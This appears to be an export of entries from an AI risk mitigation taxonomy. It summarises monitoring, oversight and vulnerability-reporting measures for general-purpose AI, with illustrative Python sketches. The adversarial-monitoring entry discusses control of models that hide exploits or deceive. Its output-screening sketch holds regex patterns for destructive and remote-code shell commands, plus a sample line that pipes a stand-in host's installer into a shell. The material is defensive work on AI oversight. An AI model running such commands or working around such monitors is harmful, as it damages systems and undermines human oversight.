Cannot be confidently classified due to insufficient information, excessive vagueness, or ambiguity.
Reasoning: The mitigation name "Monitoring" lacks a definition and supporting evidence, so neither the focal activity nor where it occurs can be identified.
Deployment
Monitoring of model capabilities
AI models are often trained to develop specific capabilities through appropriate training data and training objectives. However, models may also develop capabilities they were not specifically trained for. One subset of these is emergent capabilities, i.e., capabilities that appear in larger models but not in smaller models trained through a similar process [215]. These capabilities can be monitored, so that models are tested not only for their intended capabilities but also for unintended ones.
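As a purely illustrative sketch, such monitoring can be approximated by probing a model on task suites beyond its intended scope and flagging unexpectedly high scores. The query_model stub, the task suites, and the alert threshold below are hypothetical placeholders, not values from any cited framework:

from typing import Callable

def query_model(prompt: str) -> str:
    """Hypothetical model call; replace with a real API client."""
    return "stub answer"

# Each suite is a list of (prompt, expected answer fragment) pairs.
# Suites and threshold are illustrative assumptions.
CAPABILITY_SUITES = {
    "coding":        [("Write a Python function that reverses a string.", "def")],
    "medical":       [("Which organ produces insulin?", "pancreas")],
    "cybersecurity": [("What does a port scanner do?", "ports")],
}
ALERT_THRESHOLD = 0.5  # flag suites where accuracy exceeds this

def monitor_capabilities(model: Callable[[str], str]) -> dict[str, float]:
    """Score the model on every suite, including unintended domains."""
    scores = {}
    for suite, items in CAPABILITY_SUITES.items():
        hits = sum(expected.lower() in model(prompt).lower()
                   for prompt, expected in items)
        scores[suite] = hits / len(items)
    return scores

for suite, score in monitor_capabilities(query_model).items():
    flag = "ALERT: possible unintended capability" if score > ALERT_THRESHOLD else "ok"
    print(f"{suite}: {score:.2f} ({flag})")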
2.2.2 Testing & Evaluation

AI model-assisted oversight of AI systems
AI model-assisted oversight can help monitor and supervise the training of increasingly capable GPAI systems, which human supervisors may find difficult to oversee at scale during training or testing. Monitoring and supervision may become especially difficult where increasingly advanced GPAIs perform near or above human level in some specialized domains, and supervision quality fails to keep pace with capability improvements. The training signal may include labeled data, a reward function, and user feedback on produced outputs.
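One way to implement this, sketched below under heavy assumptions, is to use a "judge" model to score a trainee model's outputs, yielding a supervision signal that scales beyond direct human review. Both model functions are stubs standing in for real model calls; the names and the scoring scheme are hypothetical:

def trainee_model(prompt: str) -> str:
    """Stand-in for the model being trained or tested."""
    return "draft answer"

def judge_model(prompt: str, answer: str) -> float:
    """Stand-in for an oversight model rating correctness and safety in [0, 1]."""
    return 0.5

def oversight_signal(prompts: list[str]) -> list[tuple[str, str, float]]:
    """Produce (prompt, answer, score) triples usable as a training signal."""
    results = []
    for prompt in prompts:
        answer = trainee_model(prompt)
        results.append((prompt, answer, judge_model(prompt, answer)))
    return results

for prompt, answer, score in oversight_signal(["Summarize this contract clause."]):
    print(f"score={score:.2f} for {answer!r}")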
1.1.2 Learning Objectives

Post-deployment ongoing monitoring for unexpected use cases
Ongoing monitoring of AI systems can uncover emergent or newly identified capabilities and limitations, particularly when new use cases are found or in a large-scale deployment with a diverse population of users. These new capabilities or limitations can inform ongoing risk analysis. New use cases can be discovered by monitoring publications, online forums, or APIs [131]. For example, an LLM might be unexpectedly competent at giving convincing medical advice, despite not having been developed for that purpose or verified for accuracy. In that case, the potential risks of this newly found competence can be assessed.
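A minimal sketch of such monitoring, assuming a simple keyword classifier (real systems would use more robust topic models), buckets incoming prompts by topic and flags topics outside the declared intended uses. The topics, keywords, and intended-use list are illustrative assumptions:

from collections import Counter

INTENDED_USES = {"customer_support", "summarization"}
TOPIC_KEYWORDS = {
    "customer_support": ["refund", "order", "account"],
    "summarization":    ["summarize", "tl;dr"],
    "medical_advice":   ["diagnosis", "symptom", "dosage"],
}

def classify(prompt: str) -> str:
    """Assign a prompt to the first topic whose keywords it mentions."""
    text = prompt.lower()
    for topic, keywords in TOPIC_KEYWORDS.items():
        if any(keyword in text for keyword in keywords):
            return topic
    return "unknown"

def monitor(prompts: list[str]) -> None:
    """Flag query topics that fall outside the intended use cases."""
    counts = Counter(classify(p) for p in prompts)
    for topic, n in counts.items():
        if topic not in INTENDED_USES:
            print(f"unexpected use case '{topic}': {n} queries; review for risk analysis")

monitor(["What dosage of ibuprofen is safe for a child?", "Summarize this email thread."])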
2.3.3 Monitoring & Logging

Monitoring protocols for potentially adversarial GPAI systems
Similar to cybersecurity protocols, AI providers can prepare for potential adversarial action from AI systems by developing and stress-testing response protocols in advance [179]. Such adversarial action may range from hiding code exploits to strategic deception or behaviors related to loss of control. AI systems may be adversarial because of malicious actors (e.g., data poisoning) or because of unintended control failures (lack of alignment with human intent). Alongside improving system alignment, external monitoring and restrictions can be deployed in advance to catch these adversarial model malfunctions before harm is done. As with cybersecurity red teaming, any protocol that assumes adversarial action can be stress-tested in advance, for example by projecting the plausible capabilities and affordances of the adversarial actor (for a technology company, say, a hacker or a disgruntled employee). From this process, measures can be deployed that better anticipate possible adversarial action and catch unsuccessful attempts at adversarial behavior. Caught attempts can be documented in incident reports and serve as input to further risk analysis. Depending on their severity, it may be advisable to recall the system if it is deployed.
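As one minimal, assumption-laden sketch of this "catch before harm" idea, an external monitoring layer can screen model outputs against known-bad patterns and record blocked attempts as incident reports. The patterns and report fields below are illustrative, not drawn from the cited protocol work:

import datetime
import json
import re

# Illustrative signatures of adversarial output (destructive or remote-code commands).
SUSPICIOUS_PATTERNS = [
    r"rm\s+-rf\s+/",          # destructive shell command
    r"curl\s+\S+\s*\|\s*sh",  # piping remote code into a shell
]

incident_log: list[dict] = []

def screen_output(output: str) -> str | None:
    """Pass benign output through; block and log anything matching a pattern."""
    for pattern in SUSPICIOUS_PATTERNS:
        if re.search(pattern, output):
            incident_log.append({
                "time": datetime.datetime.now(datetime.timezone.utc).isoformat(),
                "pattern": pattern,
                "output_excerpt": output[:200],
            })
            return None  # blocked; escalate per the response protocol
    return output

if screen_output("Setup: curl http://host.example/install | sh") is None:
    print("blocked adversarial output; incident log:")
    print(json.dumps(incident_log, indent=2))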
1.2 Non-Model

Encouraging downstream providers to evaluate models for deployment-specific failure modes
In some cases, AI system deployers are better positioned than upstream model providers to perform certain risk management measures on the AI model within a provided AI system. For example, deployers understand their use case better and can more easily predict foreseeable misuse or failure modes. These evaluations can inform upstream model providers, or inform supplementary mitigations by the deployer.
3.3.1 Industry Coordination

Encourage reporting of critical vulnerabilities to the upstream provider or other relevant stakeholders
Downstream AI system deployers can report critical vulnerabilities or incidents to the upstream model provider and other relevant stakeholders, such as regulators. This can contribute to safe use and allow other downstream deployers to be informed of potential problems.
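To make such reporting routine, a deployer can standardize what a report contains. The sketch below shows one possible structured payload; every field name and example value is hypothetical, since real providers define their own disclosure channels:

import json
from dataclasses import dataclass, asdict

@dataclass
class VulnerabilityReport:
    """Illustrative report structure; fields are assumptions, not a standard."""
    model_id: str
    severity: str            # e.g., "critical", "high", "medium"
    description: str
    reproduction_steps: str
    reporter_contact: str

report = VulnerabilityReport(
    model_id="example-model-v1",
    severity="critical",
    description="Prompt-injection bypass of the deployed content filter.",
    reproduction_steps="Submit the crafted prompt from internal test case 7.",
    reporter_contact="security@deployer.example",
)
print(json.dumps(asdict(report), indent=2))  # payload for the provider's disclosure channel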
3.3.1 Industry Coordination

Model development → 2.4 Engineering & Development
Model development > Data-related → 1.1 Model
Model evaluations → 2.2.2 Testing & Evaluation
Model evaluations > General evaluations → 2.2.2 Testing & Evaluation
Model evaluations > Benchmarking → 3.2.1 Benchmarks & Evaluation
Model evaluations > Red teaming → 2.2.2 Testing & Evaluation

Risk Sources and Risk Management Measures in Support of Standards for General-Purpose AI Systems
Gipiškis, Rokas; San Joaquin, Ayrton; Chin, Ze Shen; Regenfuß, Adrian; Gil, Ariel; Holtman, Koen (2024)
Organizations and governments that develop, deploy, use, and govern AI must coordinate on effective risk mitigation. However, the landscape of AI risk mitigation frameworks is fragmented, uses inconsistent terminology, and has gaps in coverage. This paper introduces a preliminary AI Risk Mitigation Taxonomy to organize AI risk mitigations and provide a common frame of reference. The Taxonomy was developed through a rapid evidence scan of 13 AI risk mitigation frameworks published between 2023 and 2025, which were extracted into a living database of 831 distinct AI risk mitigations.
Operate and Monitor: Running, maintaining, and monitoring the AI system post-deployment.
Deployer: Entity that integrates and deploys the AI system for end users.
Measure: Quantifying, testing, and monitoring identified AI risks.